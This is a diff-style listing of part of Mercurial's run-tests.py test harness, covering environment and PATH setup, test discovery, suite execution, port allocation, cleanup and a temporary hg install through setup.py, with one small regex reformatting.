3038 # source directory. So until it is, do the simple thing.
3039 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3039 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3040 self._pythondir = os.path.dirname(self._testdir)
3040 self._pythondir = os.path.dirname(self._testdir)
3041 # Fall back to the legacy behavior.
3041 # Fall back to the legacy behavior.
3042 else:
3042 else:
3043 self._pythondir = self._bindir
3043 self._pythondir = self._bindir
3044
3044
3045 else:
3045 else:
3046 self._installdir = os.path.join(self._hgtmp, b"install")
3046 self._installdir = os.path.join(self._hgtmp, b"install")
3047 self._bindir = os.path.join(self._installdir, b"bin")
3047 self._bindir = os.path.join(self._installdir, b"bin")
3048 self._hgcommand = b'hg'
3048 self._hgcommand = b'hg'
3049 self._tmpbindir = self._bindir
3049 self._tmpbindir = self._bindir
3050 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3050 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3051
3051
3052 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3052 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3053 # a python script and feed it to python.exe. Legacy stdio is force
3053 # a python script and feed it to python.exe. Legacy stdio is force
3054 # enabled by hg.exe, and this is a more realistic way to launch hg
3054 # enabled by hg.exe, and this is a more realistic way to launch hg
3055 # anyway.
3055 # anyway.
3056 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3056 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3057 self._hgcommand += b'.exe'
3057 self._hgcommand += b'.exe'
3058
3058
3059 # set CHGHG, then replace "hg" command by "chg"
3059 # set CHGHG, then replace "hg" command by "chg"
3060 chgbindir = self._bindir
3060 chgbindir = self._bindir
3061 if self.options.chg or self.options.with_chg:
3061 if self.options.chg or self.options.with_chg:
3062 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3062 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3063 else:
3063 else:
3064 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3064 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3065 if self.options.chg:
3065 if self.options.chg:
3066 self._hgcommand = b'chg'
3066 self._hgcommand = b'chg'
3067 elif self.options.with_chg:
3067 elif self.options.with_chg:
3068 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3068 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3069 self._hgcommand = os.path.basename(self.options.with_chg)
3069 self._hgcommand = os.path.basename(self.options.with_chg)
3070
3070
3071 osenvironb[b"BINDIR"] = self._bindir
3071 osenvironb[b"BINDIR"] = self._bindir
3072 osenvironb[b"PYTHON"] = PYTHON
3072 osenvironb[b"PYTHON"] = PYTHON
3073
3073
3074 fileb = _bytespath(__file__)
3074 fileb = _bytespath(__file__)
3075 runtestdir = os.path.abspath(os.path.dirname(fileb))
3075 runtestdir = os.path.abspath(os.path.dirname(fileb))
3076 osenvironb[b'RUNTESTDIR'] = runtestdir
3076 osenvironb[b'RUNTESTDIR'] = runtestdir
3077 if PYTHON3:
3077 if PYTHON3:
3078 sepb = _bytespath(os.pathsep)
3078 sepb = _bytespath(os.pathsep)
3079 else:
3079 else:
3080 sepb = os.pathsep
3080 sepb = os.pathsep
3081 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3081 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3082 if os.path.islink(__file__):
3082 if os.path.islink(__file__):
3083 # test helper will likely be at the end of the symlink
3083 # test helper will likely be at the end of the symlink
3084 realfile = os.path.realpath(fileb)
3084 realfile = os.path.realpath(fileb)
3085 realdir = os.path.abspath(os.path.dirname(realfile))
3085 realdir = os.path.abspath(os.path.dirname(realfile))
3086 path.insert(2, realdir)
3086 path.insert(2, realdir)
3087 if chgbindir != self._bindir:
3087 if chgbindir != self._bindir:
3088 path.insert(1, chgbindir)
3088 path.insert(1, chgbindir)
3089 if self._testdir != runtestdir:
3089 if self._testdir != runtestdir:
3090 path = [self._testdir] + path
3090 path = [self._testdir] + path
3091 if self._tmpbindir != self._bindir:
3091 if self._tmpbindir != self._bindir:
3092 path = [self._tmpbindir] + path
3092 path = [self._tmpbindir] + path
3093 osenvironb[b"PATH"] = sepb.join(path)
3093 osenvironb[b"PATH"] = sepb.join(path)
3094
3094
3095 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3095 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3096 # can run .../tests/run-tests.py test-foo where test-foo
3096 # can run .../tests/run-tests.py test-foo where test-foo
3097 # adds an extension to HGRC. Also include run-test.py directory to
3097 # adds an extension to HGRC. Also include run-test.py directory to
3098 # import modules like heredoctest.
3098 # import modules like heredoctest.
3099 pypath = [self._pythondir, self._testdir, runtestdir]
3099 pypath = [self._pythondir, self._testdir, runtestdir]
3100 # We have to augment PYTHONPATH, rather than simply replacing
3100 # We have to augment PYTHONPATH, rather than simply replacing
3101 # it, in case external libraries are only available via current
3101 # it, in case external libraries are only available via current
3102 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3102 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3103 # are in /opt/subversion.)
3103 # are in /opt/subversion.)
3104 oldpypath = osenvironb.get(IMPL_PATH)
3104 oldpypath = osenvironb.get(IMPL_PATH)
3105 if oldpypath:
3105 if oldpypath:
3106 pypath.append(oldpypath)
3106 pypath.append(oldpypath)
3107 osenvironb[IMPL_PATH] = sepb.join(pypath)
3107 osenvironb[IMPL_PATH] = sepb.join(pypath)
3108
3108
3109 if self.options.pure:
3109 if self.options.pure:
3110 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3110 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3111 os.environ["HGMODULEPOLICY"] = "py"
3111 os.environ["HGMODULEPOLICY"] = "py"
3112
3112
3113 if self.options.allow_slow_tests:
3113 if self.options.allow_slow_tests:
3114 os.environ["HGTEST_SLOW"] = "slow"
3114 os.environ["HGTEST_SLOW"] = "slow"
3115 elif 'HGTEST_SLOW' in os.environ:
3115 elif 'HGTEST_SLOW' in os.environ:
3116 del os.environ['HGTEST_SLOW']
3116 del os.environ['HGTEST_SLOW']
3117
3117
3118 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3118 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3119
3119
3120 if self.options.exceptions:
3120 if self.options.exceptions:
3121 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3121 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3122 try:
3122 try:
3123 os.makedirs(exceptionsdir)
3123 os.makedirs(exceptionsdir)
3124 except OSError as e:
3124 except OSError as e:
3125 if e.errno != errno.EEXIST:
3125 if e.errno != errno.EEXIST:
3126 raise
3126 raise
3127
3127
3128 # Remove all existing exception reports.
3128 # Remove all existing exception reports.
3129 for f in os.listdir(exceptionsdir):
3129 for f in os.listdir(exceptionsdir):
3130 os.unlink(os.path.join(exceptionsdir, f))
3130 os.unlink(os.path.join(exceptionsdir, f))
3131
3131
3132 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3132 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3133 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3133 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3134 self.options.extra_config_opt.append(
3134 self.options.extra_config_opt.append(
3135 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3135 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3136 )
3136 )
3137
3137
3138 vlog("# Using TESTDIR", _strpath(self._testdir))
3138 vlog("# Using TESTDIR", _strpath(self._testdir))
3139 vlog("# Using RUNTESTDIR", _strpath(osenvironb[b'RUNTESTDIR']))
3139 vlog("# Using RUNTESTDIR", _strpath(osenvironb[b'RUNTESTDIR']))
3140 vlog("# Using HGTMP", _strpath(self._hgtmp))
3140 vlog("# Using HGTMP", _strpath(self._hgtmp))
3141 vlog("# Using PATH", os.environ["PATH"])
3141 vlog("# Using PATH", os.environ["PATH"])
3142 vlog(
3142 vlog(
3143 "# Using", _strpath(IMPL_PATH), _strpath(osenvironb[IMPL_PATH]),
3143 "# Using", _strpath(IMPL_PATH), _strpath(osenvironb[IMPL_PATH]),
3144 )
3144 )
3145 vlog("# Writing to directory", _strpath(self._outputdir))
3145 vlog("# Writing to directory", _strpath(self._outputdir))
3146
3146
3147 try:
3147 try:
3148 return self._runtests(testdescs) or 0
3148 return self._runtests(testdescs) or 0
3149 finally:
3149 finally:
3150 time.sleep(0.1)
3150 time.sleep(0.1)
3151 self._cleanup()
3151 self._cleanup()
3152
3152
3153 def findtests(self, args):
3153 def findtests(self, args):
3154 """Finds possible test files from arguments.
3154 """Finds possible test files from arguments.
3155
3155
3156 If you wish to inject custom tests into the test harness, this would
3156 If you wish to inject custom tests into the test harness, this would
3157 be a good function to monkeypatch or override in a derived class.
3157 be a good function to monkeypatch or override in a derived class.
3158 """
3158 """
3159 if not args:
3159 if not args:
3160 if self.options.changed:
3160 if self.options.changed:
3161 proc = Popen4(
3161 proc = Popen4(
3162 b'hg st --rev "%s" -man0 .'
3162 b'hg st --rev "%s" -man0 .'
3163 % _bytespath(self.options.changed),
3163 % _bytespath(self.options.changed),
3164 None,
3164 None,
3165 0,
3165 0,
3166 )
3166 )
3167 stdout, stderr = proc.communicate()
3167 stdout, stderr = proc.communicate()
3168 args = stdout.strip(b'\0').split(b'\0')
3168 args = stdout.strip(b'\0').split(b'\0')
3169 else:
3169 else:
3170 args = os.listdir(b'.')
3170 args = os.listdir(b'.')
3171
3171
3172 expanded_args = []
3172 expanded_args = []
3173 for arg in args:
3173 for arg in args:
3174 if os.path.isdir(arg):
3174 if os.path.isdir(arg):
3175 if not arg.endswith(b'/'):
3175 if not arg.endswith(b'/'):
3176 arg += b'/'
3176 arg += b'/'
3177 expanded_args.extend([arg + a for a in os.listdir(arg)])
3177 expanded_args.extend([arg + a for a in os.listdir(arg)])
3178 else:
3178 else:
3179 expanded_args.append(arg)
3179 expanded_args.append(arg)
3180 args = expanded_args
3180 args = expanded_args
3181
3181
3182 testcasepattern = re.compile(
3182 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3183 br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-\.#]+))'
3184 )
3185 tests = []
3183 tests = []
3186 for t in args:
3184 for t in args:
3187 case = []
3185 case = []
3188
3186
3189 if not (
3187 if not (
3190 os.path.basename(t).startswith(b'test-')
3188 os.path.basename(t).startswith(b'test-')
3191 and (t.endswith(b'.py') or t.endswith(b'.t'))
3189 and (t.endswith(b'.py') or t.endswith(b'.t'))
3192 ):
3190 ):
3193
3191
3194 m = testcasepattern.match(os.path.basename(t))
3192 m = testcasepattern.match(os.path.basename(t))
3195 if m is not None:
3193 if m is not None:
3196 t_basename, casestr = m.groups()
3194 t_basename, casestr = m.groups()
3197 t = os.path.join(os.path.dirname(t), t_basename)
3195 t = os.path.join(os.path.dirname(t), t_basename)
3198 if casestr:
3196 if casestr:
3199 case = casestr.split(b'#')
3197 case = casestr.split(b'#')
3200 else:
3198 else:
3201 continue
3199 continue
3202
3200
3203 if t.endswith(b'.t'):
3201 if t.endswith(b'.t'):
3204 # .t file may contain multiple test cases
3202 # .t file may contain multiple test cases
3205 casedimensions = parsettestcases(t)
3203 casedimensions = parsettestcases(t)
3206 if casedimensions:
3204 if casedimensions:
3207 cases = []
3205 cases = []
3208
3206
3209 def addcases(case, casedimensions):
3207 def addcases(case, casedimensions):
3210 if not casedimensions:
3208 if not casedimensions:
3211 cases.append(case)
3209 cases.append(case)
3212 else:
3210 else:
3213 for c in casedimensions[0]:
3211 for c in casedimensions[0]:
3214 addcases(case + [c], casedimensions[1:])
3212 addcases(case + [c], casedimensions[1:])
3215
3213
3216 addcases([], casedimensions)
3214 addcases([], casedimensions)
3217 if case and case in cases:
3215 if case and case in cases:
3218 cases = [case]
3216 cases = [case]
3219 elif case:
3217 elif case:
3220 # Ignore invalid cases
3218 # Ignore invalid cases
3221 cases = []
3219 cases = []
3222 else:
3220 else:
3223 pass
3221 pass
3224 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3222 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3225 else:
3223 else:
3226 tests.append({'path': t})
3224 tests.append({'path': t})
3227 else:
3225 else:
3228 tests.append({'path': t})
3226 tests.append({'path': t})
3229 return tests
3227 return tests
3230
3228
3231 def _runtests(self, testdescs):
3229 def _runtests(self, testdescs):
3232 def _reloadtest(test, i):
3230 def _reloadtest(test, i):
3233 # convert a test back to its description dict
3231 # convert a test back to its description dict
3234 desc = {'path': test.path}
3232 desc = {'path': test.path}
3235 case = getattr(test, '_case', [])
3233 case = getattr(test, '_case', [])
3236 if case:
3234 if case:
3237 desc['case'] = case
3235 desc['case'] = case
3238 return self._gettest(desc, i)
3236 return self._gettest(desc, i)
3239
3237
3240 try:
3238 try:
3241 if self.options.restart:
3239 if self.options.restart:
3242 orig = list(testdescs)
3240 orig = list(testdescs)
3243 while testdescs:
3241 while testdescs:
3244 desc = testdescs[0]
3242 desc = testdescs[0]
3245 # desc['path'] is a relative path
3243 # desc['path'] is a relative path
3246 if 'case' in desc:
3244 if 'case' in desc:
3247 casestr = b'#'.join(desc['case'])
3245 casestr = b'#'.join(desc['case'])
3248 errpath = b'%s#%s.err' % (desc['path'], casestr)
3246 errpath = b'%s#%s.err' % (desc['path'], casestr)
3249 else:
3247 else:
3250 errpath = b'%s.err' % desc['path']
3248 errpath = b'%s.err' % desc['path']
3251 errpath = os.path.join(self._outputdir, errpath)
3249 errpath = os.path.join(self._outputdir, errpath)
3252 if os.path.exists(errpath):
3250 if os.path.exists(errpath):
3253 break
3251 break
3254 testdescs.pop(0)
3252 testdescs.pop(0)
3255 if not testdescs:
3253 if not testdescs:
3256 print("running all tests")
3254 print("running all tests")
3257 testdescs = orig
3255 testdescs = orig
3258
3256
3259 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3257 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3260 num_tests = len(tests) * self.options.runs_per_test
3258 num_tests = len(tests) * self.options.runs_per_test
3261
3259
3262 jobs = min(num_tests, self.options.jobs)
3260 jobs = min(num_tests, self.options.jobs)
3263
3261
3264 failed = False
3262 failed = False
3265 kws = self.options.keywords
3263 kws = self.options.keywords
3266 if kws is not None and PYTHON3:
3264 if kws is not None and PYTHON3:
3267 kws = kws.encode('utf-8')
3265 kws = kws.encode('utf-8')
3268
3266
3269 suite = TestSuite(
3267 suite = TestSuite(
3270 self._testdir,
3268 self._testdir,
3271 jobs=jobs,
3269 jobs=jobs,
3272 whitelist=self.options.whitelisted,
3270 whitelist=self.options.whitelisted,
3273 blacklist=self.options.blacklist,
3271 blacklist=self.options.blacklist,
3274 retest=self.options.retest,
3272 retest=self.options.retest,
3275 keywords=kws,
3273 keywords=kws,
3276 loop=self.options.loop,
3274 loop=self.options.loop,
3277 runs_per_test=self.options.runs_per_test,
3275 runs_per_test=self.options.runs_per_test,
3278 showchannels=self.options.showchannels,
3276 showchannels=self.options.showchannels,
3279 tests=tests,
3277 tests=tests,
3280 loadtest=_reloadtest,
3278 loadtest=_reloadtest,
3281 )
3279 )
3282 verbosity = 1
3280 verbosity = 1
3283 if self.options.list_tests:
3281 if self.options.list_tests:
3284 verbosity = 0
3282 verbosity = 0
3285 elif self.options.verbose:
3283 elif self.options.verbose:
3286 verbosity = 2
3284 verbosity = 2
3287 runner = TextTestRunner(self, verbosity=verbosity)
3285 runner = TextTestRunner(self, verbosity=verbosity)
3288
3286
3289 if self.options.list_tests:
3287 if self.options.list_tests:
3290 result = runner.listtests(suite)
3288 result = runner.listtests(suite)
3291 else:
3289 else:
3292 if self._installdir:
3290 if self._installdir:
3293 self._installhg()
3291 self._installhg()
3294 self._checkhglib("Testing")
3292 self._checkhglib("Testing")
3295 else:
3293 else:
3296 self._usecorrectpython()
3294 self._usecorrectpython()
3297 if self.options.chg:
3295 if self.options.chg:
3298 assert self._installdir
3296 assert self._installdir
3299 self._installchg()
3297 self._installchg()
3300
3298
3301 log(
3299 log(
3302 'running %d tests using %d parallel processes'
3300 'running %d tests using %d parallel processes'
3303 % (num_tests, jobs)
3301 % (num_tests, jobs)
3304 )
3302 )
3305
3303
3306 result = runner.run(suite)
3304 result = runner.run(suite)
3307
3305
3308 if result.failures or result.errors:
3306 if result.failures or result.errors:
3309 failed = True
3307 failed = True
3310
3308
3311 result.onEnd()
3309 result.onEnd()
3312
3310
3313 if self.options.anycoverage:
3311 if self.options.anycoverage:
3314 self._outputcoverage()
3312 self._outputcoverage()
3315 except KeyboardInterrupt:
3313 except KeyboardInterrupt:
3316 failed = True
3314 failed = True
3317 print("\ninterrupted!")
3315 print("\ninterrupted!")
3318
3316
3319 if failed:
3317 if failed:
3320 return 1
3318 return 1
3321
3319
3322 def _getport(self, count):
3320 def _getport(self, count):
3323 port = self._ports.get(count) # do we have a cached entry?
3321 port = self._ports.get(count) # do we have a cached entry?
3324 if port is None:
3322 if port is None:
3325 portneeded = 3
3323 portneeded = 3
3326 # above 100 tries we just give up and let test reports failure
3324 # above 100 tries we just give up and let test reports failure
3327 for tries in xrange(100):
3325 for tries in xrange(100):
3328 allfree = True
3326 allfree = True
3329 port = self.options.port + self._portoffset
3327 port = self.options.port + self._portoffset
3330 for idx in xrange(portneeded):
3328 for idx in xrange(portneeded):
3331 if not checkportisavailable(port + idx):
3329 if not checkportisavailable(port + idx):
3332 allfree = False
3330 allfree = False
3333 break
3331 break
3334 self._portoffset += portneeded
3332 self._portoffset += portneeded
3335 if allfree:
3333 if allfree:
3336 break
3334 break
3337 self._ports[count] = port
3335 self._ports[count] = port
3338 return port
3336 return port
3339
3337
3340 def _gettest(self, testdesc, count):
3338 def _gettest(self, testdesc, count):
3341 """Obtain a Test by looking at its filename.
3339 """Obtain a Test by looking at its filename.
3342
3340
3343 Returns a Test instance. The Test may not be runnable if it doesn't
3341 Returns a Test instance. The Test may not be runnable if it doesn't
3344 map to a known type.
3342 map to a known type.
3345 """
3343 """
3346 path = testdesc['path']
3344 path = testdesc['path']
3347 lctest = path.lower()
3345 lctest = path.lower()
3348 testcls = Test
3346 testcls = Test
3349
3347
3350 for ext, cls in self.TESTTYPES:
3348 for ext, cls in self.TESTTYPES:
3351 if lctest.endswith(ext):
3349 if lctest.endswith(ext):
3352 testcls = cls
3350 testcls = cls
3353 break
3351 break
3354
3352
3355 refpath = os.path.join(getcwdb(), path)
3353 refpath = os.path.join(getcwdb(), path)
3356 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3354 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3357
3355
3358 # extra keyword parameters. 'case' is used by .t tests
3356 # extra keyword parameters. 'case' is used by .t tests
3359 kwds = dict((k, testdesc[k]) for k in ['case'] if k in testdesc)
3357 kwds = dict((k, testdesc[k]) for k in ['case'] if k in testdesc)
3360
3358
3361 t = testcls(
3359 t = testcls(
3362 refpath,
3360 refpath,
3363 self._outputdir,
3361 self._outputdir,
3364 tmpdir,
3362 tmpdir,
3365 keeptmpdir=self.options.keep_tmpdir,
3363 keeptmpdir=self.options.keep_tmpdir,
3366 debug=self.options.debug,
3364 debug=self.options.debug,
3367 first=self.options.first,
3365 first=self.options.first,
3368 timeout=self.options.timeout,
3366 timeout=self.options.timeout,
3369 startport=self._getport(count),
3367 startport=self._getport(count),
3370 extraconfigopts=self.options.extra_config_opt,
3368 extraconfigopts=self.options.extra_config_opt,
3371 py3warnings=self.options.py3_warnings,
3369 py3warnings=self.options.py3_warnings,
3372 shell=self.options.shell,
3370 shell=self.options.shell,
3373 hgcommand=self._hgcommand,
3371 hgcommand=self._hgcommand,
3374 usechg=bool(self.options.with_chg or self.options.chg),
3372 usechg=bool(self.options.with_chg or self.options.chg),
3375 useipv6=useipv6,
3373 useipv6=useipv6,
3376 **kwds
3374 **kwds
3377 )
3375 )
3378 t.should_reload = True
3376 t.should_reload = True
3379 return t
3377 return t
3380
3378
3381 def _cleanup(self):
3379 def _cleanup(self):
3382 """Clean up state from this test invocation."""
3380 """Clean up state from this test invocation."""
3383 if self.options.keep_tmpdir:
3381 if self.options.keep_tmpdir:
3384 return
3382 return
3385
3383
3386 vlog("# Cleaning up HGTMP", _strpath(self._hgtmp))
3384 vlog("# Cleaning up HGTMP", _strpath(self._hgtmp))
3387 shutil.rmtree(self._hgtmp, True)
3385 shutil.rmtree(self._hgtmp, True)
3388 for f in self._createdfiles:
3386 for f in self._createdfiles:
3389 try:
3387 try:
3390 os.remove(f)
3388 os.remove(f)
3391 except OSError:
3389 except OSError:
3392 pass
3390 pass
3393
3391
3394 def _usecorrectpython(self):
3392 def _usecorrectpython(self):
3395 """Configure the environment to use the appropriate Python in tests."""
3393 """Configure the environment to use the appropriate Python in tests."""
3396 # Tests must use the same interpreter as us or bad things will happen.
3394 # Tests must use the same interpreter as us or bad things will happen.
3397 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3395 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3398
3396
3399 # os.symlink() is a thing with py3 on Windows, but it requires
3397 # os.symlink() is a thing with py3 on Windows, but it requires
3400 # Administrator rights.
3398 # Administrator rights.
3401 if getattr(os, 'symlink', None) and os.name != 'nt':
3399 if getattr(os, 'symlink', None) and os.name != 'nt':
3402 vlog(
3400 vlog(
3403 "# Making python executable in test path a symlink to '%s'"
3401 "# Making python executable in test path a symlink to '%s'"
3404 % sysexecutable
3402 % sysexecutable
3405 )
3403 )
3406 mypython = os.path.join(self._tmpbindir, pyexename)
3404 mypython = os.path.join(self._tmpbindir, pyexename)
3407 try:
3405 try:
3408 if os.readlink(mypython) == sysexecutable:
3406 if os.readlink(mypython) == sysexecutable:
3409 return
3407 return
3410 os.unlink(mypython)
3408 os.unlink(mypython)
3411 except OSError as err:
3409 except OSError as err:
3412 if err.errno != errno.ENOENT:
3410 if err.errno != errno.ENOENT:
3413 raise
3411 raise
3414 if self._findprogram(pyexename) != sysexecutable:
3412 if self._findprogram(pyexename) != sysexecutable:
3415 try:
3413 try:
3416 os.symlink(sysexecutable, mypython)
3414 os.symlink(sysexecutable, mypython)
3417 self._createdfiles.append(mypython)
3415 self._createdfiles.append(mypython)
3418 except OSError as err:
3416 except OSError as err:
3419 # child processes may race, which is harmless
3417 # child processes may race, which is harmless
3420 if err.errno != errno.EEXIST:
3418 if err.errno != errno.EEXIST:
3421 raise
3419 raise
3422 else:
3420 else:
3423 exedir, exename = os.path.split(sysexecutable)
3421 exedir, exename = os.path.split(sysexecutable)
3424 vlog(
3422 vlog(
3425 "# Modifying search path to find %s as %s in '%s'"
3423 "# Modifying search path to find %s as %s in '%s'"
3426 % (exename, pyexename, exedir)
3424 % (exename, pyexename, exedir)
3427 )
3425 )
3428 path = os.environ['PATH'].split(os.pathsep)
3426 path = os.environ['PATH'].split(os.pathsep)
3429 while exedir in path:
3427 while exedir in path:
3430 path.remove(exedir)
3428 path.remove(exedir)
3431 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3429 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3432 if not self._findprogram(pyexename):
3430 if not self._findprogram(pyexename):
3433 print("WARNING: Cannot find %s in search path" % pyexename)
3431 print("WARNING: Cannot find %s in search path" % pyexename)
3434
3432
3435 def _installhg(self):
3433 def _installhg(self):
3436 """Install hg into the test environment.
3434 """Install hg into the test environment.
3437
3435
3438 This will also configure hg with the appropriate testing settings.
3436 This will also configure hg with the appropriate testing settings.
3439 """
3437 """
3440 vlog("# Performing temporary installation of HG")
3438 vlog("# Performing temporary installation of HG")
3441 installerrs = os.path.join(self._hgtmp, b"install.err")
3439 installerrs = os.path.join(self._hgtmp, b"install.err")
3442 compiler = ''
3440 compiler = ''
3443 if self.options.compiler:
3441 if self.options.compiler:
3444 compiler = '--compiler ' + self.options.compiler
3442 compiler = '--compiler ' + self.options.compiler
3445 if self.options.pure:
3443 if self.options.pure:
3446 pure = b"--pure"
3444 pure = b"--pure"
3447 else:
3445 else:
3448 pure = b""
3446 pure = b""
3449
3447
3450 # Run installer in hg root
3448 # Run installer in hg root
3451 script = os.path.realpath(sys.argv[0])
3449 script = os.path.realpath(sys.argv[0])
3452 exe = sysexecutable
3450 exe = sysexecutable
3453 if PYTHON3:
3451 if PYTHON3:
3454 compiler = _bytespath(compiler)
3452 compiler = _bytespath(compiler)
3455 script = _bytespath(script)
3453 script = _bytespath(script)
3456 exe = _bytespath(exe)
3454 exe = _bytespath(exe)
3457 hgroot = os.path.dirname(os.path.dirname(script))
3455 hgroot = os.path.dirname(os.path.dirname(script))
3458 self._hgroot = hgroot
3456 self._hgroot = hgroot
3459 os.chdir(hgroot)
3457 os.chdir(hgroot)
3460 nohome = b'--home=""'
3458 nohome = b'--home=""'
3461 if os.name == 'nt':
3459 if os.name == 'nt':
3462 # The --home="" trick works only on OS where os.sep == '/'
3460 # The --home="" trick works only on OS where os.sep == '/'
3463 # because of a distutils convert_path() fast-path. Avoid it at
3461 # because of a distutils convert_path() fast-path. Avoid it at
3464 # least on Windows for now, deal with .pydistutils.cfg bugs
3462 # least on Windows for now, deal with .pydistutils.cfg bugs
3465 # when they happen.
3463 # when they happen.
3466 nohome = b''
3464 nohome = b''
3467 cmd = (
3465 cmd = (
3468 b'"%(exe)s" setup.py %(pure)s clean --all'
3466 b'"%(exe)s" setup.py %(pure)s clean --all'
3469 b' build %(compiler)s --build-base="%(base)s"'
3467 b' build %(compiler)s --build-base="%(base)s"'
3470 b' install --force --prefix="%(prefix)s"'
3468 b' install --force --prefix="%(prefix)s"'
3471 b' --install-lib="%(libdir)s"'
3469 b' --install-lib="%(libdir)s"'
3472 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3470 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3473 % {
3471 % {
3474 b'exe': exe,
3472 b'exe': exe,
3475 b'pure': pure,
3473 b'pure': pure,
3476 b'compiler': compiler,
3474 b'compiler': compiler,
3477 b'base': os.path.join(self._hgtmp, b"build"),
3475 b'base': os.path.join(self._hgtmp, b"build"),
3478 b'prefix': self._installdir,
3476 b'prefix': self._installdir,
3479 b'libdir': self._pythondir,
3477 b'libdir': self._pythondir,
3480 b'bindir': self._bindir,
3478 b'bindir': self._bindir,
3481 b'nohome': nohome,
3479 b'nohome': nohome,
3482 b'logfile': installerrs,
3480 b'logfile': installerrs,
3483 }
3481 }
3484 )
3482 )
3485
3483
3486 # setuptools requires install directories to exist.
3484 # setuptools requires install directories to exist.
3487 def makedirs(p):
3485 def makedirs(p):
3488 try:
3486 try:
3489 os.makedirs(p)
3487 os.makedirs(p)
3490 except OSError as e:
3488 except OSError as e:
3491 if e.errno != errno.EEXIST:
3489 if e.errno != errno.EEXIST:
3492 raise
3490 raise
3493
3491
3494 makedirs(self._pythondir)
3492 makedirs(self._pythondir)
3495 makedirs(self._bindir)
3493 makedirs(self._bindir)
3496
3494
3497 vlog("# Running", cmd.decode("utf-8"))
3495 vlog("# Running", cmd.decode("utf-8"))
3498 if subprocess.call(_strpath(cmd), shell=True) == 0:
3496 if subprocess.call(_strpath(cmd), shell=True) == 0:
3499 if not self.options.verbose:
3497 if not self.options.verbose:
3500 try:
3498 try:
3501 os.remove(installerrs)
3499 os.remove(installerrs)
3502 except OSError as e:
3500 except OSError as e:
3503 if e.errno != errno.ENOENT:
3501 if e.errno != errno.ENOENT:
3504 raise
3502 raise
3505 else:
3503 else:
3506 with open(installerrs, 'rb') as f:
3504 with open(installerrs, 'rb') as f:
3507 for line in f:
3505 for line in f:
3508 if PYTHON3:
3506 if PYTHON3:
3509 sys.stdout.buffer.write(line)
3507 sys.stdout.buffer.write(line)
3510 else:
3508 else:
3511 sys.stdout.write(line)
3509 sys.stdout.write(line)
3512 sys.exit(1)
3510 sys.exit(1)
3513 os.chdir(self._testdir)
3511 os.chdir(self._testdir)
3514
3512
3515 self._usecorrectpython()
3513 self._usecorrectpython()
3516
3514
3517 if self.options.py3_warnings and not self.options.anycoverage:
3515 if self.options.py3_warnings and not self.options.anycoverage:
3518 vlog("# Updating hg command to enable Py3k Warnings switch")
3516 vlog("# Updating hg command to enable Py3k Warnings switch")
3519 with open(os.path.join(self._bindir, 'hg'), 'rb') as f:
3517 with open(os.path.join(self._bindir, 'hg'), 'rb') as f:
3520 lines = [line.rstrip() for line in f]
3518 lines = [line.rstrip() for line in f]
3521 lines[0] += ' -3'
3519 lines[0] += ' -3'
3522 with open(os.path.join(self._bindir, 'hg'), 'wb') as f:
3520 with open(os.path.join(self._bindir, 'hg'), 'wb') as f:
3523 for line in lines:
3521 for line in lines:
3524 f.write(line + '\n')
3522 f.write(line + '\n')
3525
3523
3526 hgbat = os.path.join(self._bindir, b'hg.bat')
3524 hgbat = os.path.join(self._bindir, b'hg.bat')
3527 if os.path.isfile(hgbat):
3525 if os.path.isfile(hgbat):
3528 # hg.bat expects to be put in bin/scripts while run-tests.py
3526 # hg.bat expects to be put in bin/scripts while run-tests.py
3529 # installation layout put it in bin/ directly. Fix it
3527 # installation layout put it in bin/ directly. Fix it
3530 with open(hgbat, 'rb') as f:
3528 with open(hgbat, 'rb') as f:
3531 data = f.read()
3529 data = f.read()
3532 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3530 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3533 data = data.replace(
3531 data = data.replace(
3534 br'"%~dp0..\python" "%~dp0hg" %*',
3532 br'"%~dp0..\python" "%~dp0hg" %*',
3535 b'"%~dp0python" "%~dp0hg" %*',
